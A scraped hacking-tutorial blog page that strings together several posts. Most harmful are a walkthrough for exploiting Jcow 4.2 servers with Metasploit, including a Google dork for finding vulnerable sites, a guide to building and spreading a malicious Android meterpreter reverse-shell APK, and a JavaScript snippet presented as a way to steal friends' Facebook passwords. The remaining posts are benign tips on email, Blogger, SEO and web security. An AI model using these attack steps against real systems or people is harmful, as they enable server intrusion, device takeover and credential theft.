Thursday, April 17, 2014

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution


Level : Medium
Victim Server : Windows XP SP3
Victim vulnerable application : JCow 4.2
Attacker O.S : Backtrack 5 R1
After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social netwoking engine can be exploited and the exploit ranking marked as "excellent".
So actually what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example if you hosting your Jcow vulnerable version(on unsecure hosting also :-) ) you can own your web server directory.
In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext:Powered by Jcow 4.2.0" and register as normal user there. In this tutorial I have already register as username : victim and password also victim :-)
Okay I hope you understand what I say above :-P to make it more realistic, let's try the tutorial…

Requirement :

1. Metasploit framework
2. Jcow.rb exploit
mediafire.com

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution :

1. Copy the downloaded jcow.rb exploit from the download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
the text "framework" with blue color it's because I'm using Backtrack 5 R1 and using metasploit v4.0.1, so the name was depends on your Metasploit version, maybe on your computer it can be "framework3" or "framework2" so on..
If you didn't know how to copy that jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing(click here).
2. Open your Metasploit console and then use the exploit you just added before.
msf > use exploit/remote/jcow
3. The next step we need to view the available switch for this exploit by running show options command, and then configured it(see the box with red color).
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow
Information :
Set uri can be used if jcow was not installed on webserver main directory, for example http://web-server.com/jcow.
4. After everything was set up successfully, the next thing to do was exploiting or running the exploit by using exploit command.
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Hacking Android Smartphone Tutorial using Metasploit

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast. - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf
 Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.


What is android? according to wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
 


Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
Hacking Android Smartphone Tutorial using Metasploit
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Hacking Android Smartphone Tutorial using Metasploit
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Hacking Android Smartphone Tutorial using Metasploit
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution :-) ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
Hacking Android Smartphone Tutorial using Metasploit
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Hacking Android Smartphone Tutorial using Metasploit
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:




Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast. - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf
Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast. - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Saturday, April 12, 2014

Yahoo mail Top Tips, Tricks and Hacks



    If you have been using Yahoo Mail and find yourself looking for some Tips and Tricks then Here is a collection of tips, tricks and Hacks for Yahoo Mail : Check out the latest episode of Upgrade Your Life on Yahoo! and manage your e-mails with latest Easter Eggs.

Yahoo! Tips Tricks and Hacks:


    Trick:Instant Address Book Add - Drag a message onto the Contacts link and you'll see the icon change to a plus sign which means you can add that contact to your address book in one easy step.
    Trick:Navigate your inbox the quick way - Ctrl + Shift + Up Arrow or Down Arrow let you jump to messages in the same folder that have the same subject line. You can hit Ctrl + Shift + Alt + Up Arrow lets you choose another factor to filter on (such as flag) when using Ctrl + Shift to navigate.
    Easter Egg:When composing a message just hit the Subject: button to cycle through a collection of random (often humorous) subject lines. A lot of real gems in here including: * The brain has been polished professor. * All your platypus are belong to us. * I believe those were mouse droppings. * The twins just turned 2 and 4 this month! * How about never? Is never good for you? * Care for a foam apple?
    Hack:Organize Your inbox via Message Finder - Now it is as easy as typing in a search, ordering the results by Contact, Location, or Subject, selecting the messages, and dragging them to a new folder. Sounds complicated? It isn't, just do a search and then start dragging and dropping messages.
    Tip:Select Multiple Messages - Hold shift after selecting a message to select multiple messages. Hold Ctrl to add specific messages to the list. Hit Crtl-A to select all messages in a folder or search results. This is a great way to select everything in your inbox and move it to an archive folder. Set messages to be read as soon as you click on them.
    Tip:Read Messages Now - Go to Options link in the upper right hand corner and then select Mail Options. Find the item labeled mark messages as read and select immediately. This way when you scroll through messages you no longer have to pause one each one to have it marked as read.
    Tip:Hide/Show Viewing Pane - Just hit the letter V on your keyboard to have more space to organize your folder. Hit V again to reopen the message preview.
    Tip:Quick Compose - Type the letter N to start a new message or R to reply to a selected message. Find text within a message
    Trick:Find Text within your message - Hit Crtl + F after selecting a message to find text within a that message. Hitting the enter key lets your scroll through each instance of the word within the message.
    Trick:Scroll through folder without reading - Holding Crtl lets you scroll through a folder messages using the arrow keys without selecting each individual message.
    Tip:Send Message Now - By using the Crtl + Enter Key you can send a message you are composing instantly. No more hunting for the send button.
    That's it! There are quite a few more shortcuts document in the help section but these are the one's I've found most valuable. Leave a comment and share your Yahoo Mail tips.

Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Create Multiple Accounts using same Email ID

GMAIL


Gmail is a free, advertising-supported email service provided by Google. Users may access Gmail as secure webmail, as well as via POP3 or IMAP4 protocols. Gmail initially started as an invitation-only beta release on April 1, 2004 and it became available to the general public on February 7, 2007, though still in beta status at that time. The service was upgraded from beta status on July 7, 2009, along with the rest of the Google Apps suite.

With an initial storage capacity offer of 1 GB per user, Gmail significantly increased the webmail standard for free storage from the 2 to 4 MB its competitors such as Hotmail offered at that time. Individual Gmail messages, including attachments, may be up to 25 MB,. Gmail has a search-oriented interface and a "conversation view" similar to an Internet forum. Gmail is noted by web developers for its pioneering use of Ajax. Gmail runs on Google GFE/2.0 on Linux. As of June 2012, it is the most widely used web-based email provider with over 425 million active users worldwide.


Amazing gmail secret trick

Do you know ?
You can create multiple user accounts (IDs) on websites with a single gmail id. The trick is to use only one Gmail account or gmail id and create many different accounts. 

At-least every website don't allow you to create more then one account associated with same email id. It would be much of a chaotic situation, in case this was possible for every website.

Creating multiple accounts with Gmail is possible for a single website. 

How to create many accounts on a websites with single email id?

Its possible because gmail account does not count dot(.) in email addresses.

Example : xyz@gmail. com and x.yz@gmail.com both are same email address.

This simply means if you send email to x.yz@gmail.com then it will go to xyz@gmail.com. So if you already have your account on a website with xyz@gmail.com you can create an account by registering with x.yz@gmail.com

Similarly, you can imagine how many accounts you would be able to create on same website using a single email id, that too of gmail. 

Note :  90% websites including twitter will allow you to signup with your single gmail id. But Facebook is listed in the other 10% of websites. It won't allow this even if you use dot.

Hope you enjoyed the trick .
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Facebook Password Hack | Hack IT NOW

Facebook Password Hack | FriendFacebook Password Hack

Many of you guys asked me to post any easy prank to hack facebook password which doesn't require any phishing, key logger or any other difficult method. So here I go with this amazing trick for you all guys to hack any facebook password.

This facebook hack trick will only work when the user has not logged in and is using chrome.

Related : Add all facebook friends to a group in one click

Like us on Facebook for more such updates

Just follow these simple steps mentioned below to know the password of your facebook friend:-

Note : This prank works only when your facebook friends entered their username and password and their password is visible to you only as asterisk while they are using Google Chrome browser .

Step 1 : Open Google Chrome tab where your friends have entered their username and password but password is visible only as asterisk (******) .




Step 2 : Now open console window by just pressing CTRL + SHIFT + J .







Step 3 : Copy the given code by selecting the given code and pressing CTRL + C


Facebook Password Hack | Friend




javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}


Step 4 : Press Enter and you are done . The original password would be displayed as shown in the screen - shot below .

Facebook Password Revealed +Maven Scientists  


Enjoy ! Hope you enjoyed the trick .



Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Ankit Fadia Hacking Tricks | PDF Free EBOOK DOWNLOAD

Ankit Fadia Hacking Tricks | Free Ebook Download


Ankit Fadia Hacking Tricks PDF Free Download

Assessing Server Security - State of the Art. The talk takes into consideration the progress that has been made in web server security over the last few years, and the progress that has been made in attacking web servers over the same time. The paper visits the new vulnerabilities introduced by web applications and discuss the thinking applied to discover such vulnerabilities. It finally describes the state of the art of web server scanning technology. Ankit Fadia Hacking Tricks PDF Free Download

See More Links that might interest you.

Ankit Fadia Resume

Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Free Online Tools to Check your Blog For Malware Scripts


Online Malware Scanning Tools
Malware is a malicious piece of code that messes up with the functionalities of your website or blogs and once it gained access to them they can collect sensitive information from your websites. When we add third-party widgets or plugins to our blogs we don’t know about what sort of scripts are placed in there or when we go for a free template for our blogs then also we don’t know what’s placed in there. As prevention, we can check our blog for malware after applying templates or widgets to make sure our blogs are free from malware. In this article we will tell you free online tools to check your blog for malware scripts.
These days bloggers is its self-monitoring blogs for malware scripts and if any found they will add a warning message of malware each time user sees your blog and also shoot you email in webmaster tools. This will bear upon your reputation among your readers and they might be uncomfortable in seeing your blog again in a fear of malware. So it is better that you ascertain out your blog for malware and try to resolve before blogger checks it.

Free Online Tools to Check your Blog For Malware Scripts


Sucuri.net
Sucuri provides free online check for malware scripts placed on your blogs and list out basic information about the check. You can use its paid version for in-depth analysis and it is run round the clock. Block suspicious activities, notifying you if something is going wrong on your blog. Works all the time for you even when you are catching some Z's. 
Visit http://sitecheck2.sucuri.net/ and insert your blog URL in Scan website text box, then press Scan Website button to initiate the procedure.
online Malware Scan
Virustotal
Virustotal is the product of Google, it is actually a free service which analyzes your blogs for suspicious files and URLS. It also detects viruses, Trojans, worms and of course all types of malware. You can bank on this service as it is provided by Google. 
Visit virustotal.com and Select the URL tab and insert your blog URL in the text box, then press scan it button rest will be done by Virustotal.
Free online Malware and Virus check for Websites
Do check your blogs with these free online malware check tools and keep your blog safe from malware and other harmful scripts. Do share you thought with us about this article in comments.
 


Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Make Your Blogger Blog Private or Give Access to Specific users


There could be various reasons for which a blogger would like to make his/ her blog private or give access to specific people. Some are coming into my mind which I am sharing with you is we create widgets for our blogs or to share with other people through our blogs and we normally create a separate blog for testing purpose. These cases of blogs are to be meant for public users they are for developers or webmasters of that blog. So today the topic which I am covering on my blog is make your blogger blog private or give access to specific users.

Make Your Blogger Blog Private or Give Access to Specific users

By default your blog is set to be viewed as public. Which means anyone on the internet can view your blog. Stick with the below steps carefully.
Login to your blogger blog and go to settings >> Basic settings >> Blog Readers and click on edit see below video for reference.

Settings blog

Make your Blog private

Once you have clicked edit, select Private –only blog readers radio button and click on save changes this will make your blogger blog private and only visible to blog admin and authors. See below pictorial representation to obtain the clean depiction.

make your blog private

Give Access to Specific users

To give access to specific users to your blog select private –Only these readers’ option and click on +Add readers link this will open text area. In this text area, enter email address of those who you would like to give access to your blog, see below image to get a clear idea. Remember they will have to login before they can see your web log.

Make your blog visible to limited users


I hope this effort of ours will help you in making your blogger blog private or giving access to specific users. This is the guest post written by Priyank Jain of easyearningmethods


Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

How to Receive Comment Notifications Via email in Blogger


Comment Notification for blogger Are you running a blogger blog and want to receive comments notifications when some when comment on your blogger blog then you have chosen a correct article to learn. Here we are giving a solution for it in this article we will tell step by step procedure to receive comment notifications via email in blogger.

How to Receive Comment Notifications Via email in Blogger

Step 1
Sign inn to your blogger dashboard. If you have multiple blogger blogs in your account select the one on you would like to enable comment notifications.
Step 2
Once you have selected blog, go to Settings >> Mobile and email. Then go to Comment Notification email text box and enter emails address on which you would like to receive comment notifications.
You can enter up to ten email address in this text-box separated by commas (,).

Step 3
After you have entered your email in this text box press save settings button to complete the process. Now any one will comment on your posts you will receive comment notifications in your entered email.
If you have set Gmail address in comment notification section, you will receive comments in the social section of your Gmail account.
I hope now through this article you have learned how to receive comment notifications via email in blogger. Check our post on disabling comment from blogger blog if you want to remove comments from your blogs. Do write to us in comments section about these articles.



Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Top 5 SEO Skills

Top SEO Skills To Learn in 2014
The basics and fundamentals of SEO change periodically over the years. These ever-changing circumstances lead most of us to learn some new things every year - and let of some things old. You see, there are new SEO skills needed each year (or every so often) to keep up with the change and keep surviving. 2014 is no exception. A lot has changed since last year, and there's a lot of new stuff to be learned.

Here are some top SEO skills one should learn in order to be successful in 2014.

1. Public Relations

This era is all about public relations! They've always been an integral part of any successful marketing campaign, but are now more important than ever. Today's customer is harder than ever to get.
Public relations can be used to build strong powerful links - links that don’t trigger penalties such as Penguin. Understanding how to pitch a story to news outlets, get them to run the story, and then link back to your site, will be one of the most powerful link building tactics now and in the future.

2. Research

Whether it’s keyword research or content development; research is becoming an increasingly important step with SEO. Not to say that it wasn't before, but is now more so than ever. The Google Hummingbird update has now forced (or is trying to force) webmasters to develop an understanding of user intent, i.e. how users search on Google. This goes a lot deeper than regular keyword research. SEOs need to now understand what types of questions users are asking, not just what words are relevant to the page, since the Hummingbird now entertains 'conversational' search queries as compared to simple keywords.

3. Taxonomy Design

Taxonomy is the practice of classifying things at a conceptual level. Roughly put, this can include your blog labels (for Blogger) and Categories and Tags (for WordPress). They might sound simple, but there's more to them than meets they eye. Suppose you have an online store that sells computer accessories. You might start organizing your inventory around product types. But maybe your target demographic searches for products by type of use, or by manufacturer. A small percentage of this demographic that might include enthusiast gamers might search specifically for gaming products, so there might be a need for further classification. There are a lot of ways you can classify information, and doing it the right way is the art to learn.
Why is taxonomy design so important for SEO? With Hummingbird, mobile search, and other future search trends, defining concepts is more important than ever. A strong taxonomy design can be the foundation for other important elements such as content development, information architecture, and keyword research.

4. Community Management

Online community management has become an important task with brand building and social media management. Having a robust community means more exposure for your brand, and a closer connection to potential consumers. With Google’s ever increasing dependence on Google+ as a platform, community management is becoming an important part of SEO. Sites with strong Google+ profiles will get more exposure and tend to rank higher.

5. HTML and Structured Data

Of course, it goes without saying that a basic understanding of HTML is valuable asset to SEO. Meta, title, and anchor tags are the traditional on-page SEO HTML elements. However, now Google is putting more emphasis on structured data and authorship. Both of which requires unique HTML tags to implement.


Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Monday, December 23, 2013

6 Web Security Risks of Not Monitoring Internet Activity

web security tips
Internet access is one of the most important things you can provide to your users. It’s a morale booster, it helps them do their job (for some it is even a vital component of their job,) it enables them to find solutions to problems, research the competition, find new customers, and more. But Internet access comes with a host of threats and if you are not on top of your web security game, allowing your users to have Internet access may cause just as many problems as it can solve. If you are going to provide your users Internet access, consider these top six web security risks of not monitoring Internet activity, and deploy a web security solution to make sure you don’t regret the generosity to your users.

1. Malware
Whether your users download infected files or they just visit compromised websites, malware infections are the single biggest risk to your users from Internet access. Web security applications can scan all files for malware and block access to known infected sites. They can also filter out malicious scripts embedded in web pages, providing strong protection against malware for your users.

2. Phishing
Phishing attacks not only put your users at risk, they can have significant and long lasting impact to your customers, your financials, and your reputation. As much as we raise awareness of phishing attacks, you can read about a new business falling victim almost weekly. Web security software can completely block access to known phishing sites, so even if your users do fall for a phishing email, they cannot submit sensitive information to the attacker’s website.

3. Copyright infringement
Even the best intentions can lead to costly impact to your business, and when users download audio and video files without obtaining the rights to them, the copyright holders can go after your business for compensation. Web security software can block the download of media files, or can filter access based on category to help prevent users from downloading content that might cost you in the long term.

4. Licensing violations
Audio and video are not the only ways a user’s actions can lead to fines and penalties. When users download and install software without obtaining a license for it, the company can be held liable as well. Sites that host cracked software, keygens, and other warez can be blocked completely using web security software, so you can exercise due diligence and avoid a run-in with the Business Software Alliance or other licensing issue.

5. Human Resources incidents
What’s appropriate to access at work and what users may be accustomed to accessing at home are often at opposite ends of the content spectrum, and it’s easy for a user to be offended, or even feel harassed, if exposed to content another user is accessing. This leads to workplace problems including morale issues, teamwork challenges, and can quickly escalate to an incident that involves HR and could lead to someone losing their job. You can avoid all of that by using web security software to block access to content inappropriate for the workplace, and to enforce safe search results in the major search engines.

6. Bandwidth consumption
Media sites such as YouTube, Netflix, Hulu, Pandora, Internet radio and television streaming sites, and others are great for when you are at home, but if only a handful of your users decide to start listening to their favorite music feed, or surreptitiously watching a movie while they should be working, you can quickly find your network without enough bandwidth to support the business critical applications like email. Web security software can block access to the non-business critical sites, and throttle bandwidth consumption for the sites you do want to allow, to ensure there is enough available for what your network really needs.

7. Wasting time
How often has a “quick” web search or social media check-in caused you to lose track of time? Now multiply that by the number of users on your network, who will do exactly the same thing, and you can quickly see how you can lose hours of productivity each day. Web security software can block access to social media sites, but the best products can instead simply limit the amount of total time or the time frames when users can use the web for recreational purposes. A few minutes here and there is a perfectly good way to ensure morale doesn’t suffer, and if a user wants to spend their lunch break updating their wall…what’s the harm in that, as long as they get back to work at the end of their lunch?

So don’t think web access without addressing web security. Web security applications can monitor access, filter out malware, block access to phishing sites or repositories, prevent the download of files that might contain copyrighted material, restrict the amount of bandwidth burned on streaming media, and even keep users from wasting time on social media sites. Web security applications are a critical component of your Internet security, and help to ensure that Internet access is a benefit, and not a risk to your company.

This guest post was provided by Casper Manes on behalf of GFI Software Ltd.

All product and company names herein may be trademarks of their respective owners.
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More

Blackhat SEO poisoning attacks

Recently , i have reported that Google Image search and Bing Image search leads to malware sites especially a blackhole exploit kit page. The reason behind this attack is SEO Poisoning.

What is SEO?
Search engine optimization (SEO) is a collection of techniques to improve the visibility of a website in a search engine's search results. Some of the techniques used by webmasters in

What is BlackHat SEO?

Black Hat SEO , also known as SEO poisoning, is a illegal-technique used by cyber criminals to make their links appear higher than legitimate results. When a user search for related keywords, the infected links appear in the top of the search results

Hacker use one of the following techniques:

*Creating SEO-friendly fake pages related to poplar search topics on  compromised sites
*Cloak malicious content from sphiders and security researchers.
* Iframe injection

Poisoning Image search Results:
As most of search engines filter and find the text-based seo poisoning attacks, Cyber criminals now poisoning the Image search results instead.

They hacked legitimate sites and inject malicoius code.  Whenever a person click the Image of compromised site in the search result , it will redirect him to malware sites.  Sophos reports that bing image-search results are being poisoned more than other search engines.
Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)
Read More
Member
About Us - Privacy Policy - Contact Us
@ Copyright 2013 Powered By Blogger